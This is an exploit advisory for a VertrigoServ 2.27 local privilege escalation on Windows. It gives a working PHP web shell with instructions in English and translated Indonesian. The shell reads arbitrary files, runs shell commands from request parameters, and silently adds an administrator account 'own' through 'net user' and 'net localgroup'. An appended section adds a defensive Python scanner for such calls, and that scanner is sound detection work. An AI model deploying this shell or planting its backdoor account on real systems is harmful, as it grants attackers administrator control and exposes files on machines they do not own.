=====================================================
Vertrigoserv 2.27 Local Privilege Escalation Exploit
=====================================================

:------------------------------------------------------------------------------:
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit
: # Date          : May 19th 2012
: # Author        : X-Cisadane
: # Software Link : http://vertrigo.sourceforge.net/
: # Version       : 2.27
: # Category      : Desktop (Windows) Applications
: # Platform      : Win32
: # Vulnerability : Local Privilege Escalation Exploit
: # Tested On     : Windows XP Professional Service Pack 3
: # Greetz to     : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:------------------------------------------------------------------------------:

Proof Of Concept :
================

[ENGLISH]
1. Run VertrigoServ
2. Create a file named script.php in X:\VertrigoServ Installation Directory\www\
3. Fill script.php with this script & save!

<?php
//I'm using code from Inphex (inphex0 at googlemail.com)
//Copyrighted (C) Inphex
error_reporting(E_ALL ^ E_NOTICE);
// qmB: directory to list (defaults to the current directory)
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF'])) {
    // qrF: print up to 50000 bytes of the named file
    $qrX = fopen($_GET['qrF'],"r");
    echo fread($qrX,50000);
    exit;
} elseif(isset($_GET['qQx'])) {
    // qQx: create the local user "own" (password "own") and add it to Administrators
    exec("net user own own /add & net localgroup Administrators own /add");
    echo "User own -> full privileges successfully added";
    exit;
}
// Default view: output of "dir" for the chosen directory, then links to its entries
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){
    switch(filetype($qQa.$qQr)) {
        case "dir":
            echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
            break;
        case "file":
            echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
            break;
    }
}
?>

4. Open your browser & go to http://localhost/script.php?qQx
5. If successful, it will show this message : User own -> full privileges successfully added
6. Now, open Command Prompt and type Net User then press enter! It will show a new user (own) & the password is own.

[INDONESIAN] (translated to English)
1. Run VertrigoServ
2. Create a file named script.php in X:\Directory where VertrigoServ is installed\www\
3. Fill the script.php file with the script above & save!
4. Open your browser and go to http://localhost/script.php?qQx
5. If successful, this message will appear : User own -> full privileges successfully added
6. Now open Command Prompt, type Net User and press enter! A new user named own with the password own will then appear.
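
Added example, not part of the original advisory: a Python check a defender could run over PHP files found under the www\ directory to flag shell calls of the kind the PoC uses (a fixed account-creation command through exec(), and request input reaching shell_exec() through a variable). The names scan_php and SAMPLE, the severity labels and the sample PHP are constructed for illustration; the taint tracking is line-based and assumes one statement per line.

```python
import re

# PHP functions that pass a string to the OS shell (the PoC uses exec and shell_exec).
SHELL_CALL = re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Windows account changes of the kind the PoC issues through exec().
ACCOUNT_CMD = re.compile(r"\bnet\s+(user|localgroup)\b[^;]*?/add\b", re.I)
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=(?!=)(.*)$")
VAR = re.compile(r"\$\w+")

def scan_php(source):
    """Return (line_no, severity, reason) for each shell call in a PHP source string."""
    tainted = set()   # variables whose value derives from request input
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        assign = ASSIGN.match(line)
        if assign:
            rhs = assign.group(2)
            if SUPERGLOBAL.search(rhs) or tainted & set(VAR.findall(rhs)):
                tainted.add(assign.group(1))
        call = SHELL_CALL.search(line)
        if not call:
            continue
        args = line[call.end():]
        name = call.group(1)
        if ACCOUNT_CMD.search(args):
            findings.append((no, "high", name + "() changes local accounts"))
        elif SUPERGLOBAL.search(args) or tainted & set(VAR.findall(args)):
            findings.append((no, "medium", name + "() runs request-controlled input"))
        else:
            findings.append((no, "low", name + "() runs a fixed command"))
    return findings

# Constructed sample that mirrors the structure of the PoC (not the PoC itself).
SAMPLE = '''<?php
$dir = ($_GET['d'] == "") ? "./" : $_GET['d'];
if (isset($_GET['x'])) {
    exec("net user demo demo /add & net localgroup Administrators demo /add");
}
echo htmlspecialchars(shell_exec("cd " . $dir . " & dir"));
echo shell_exec("ver");
'''

if __name__ == "__main__":
    for line_no, severity, reason in scan_php(SAMPLE):
        print(f"line {line_no}: [{severity}] {reason}")
```

To cover a whole web root, read each .php file and pass its text to scan_php; any "high" or "medium" finding in a file that the site owner did not write deserves review.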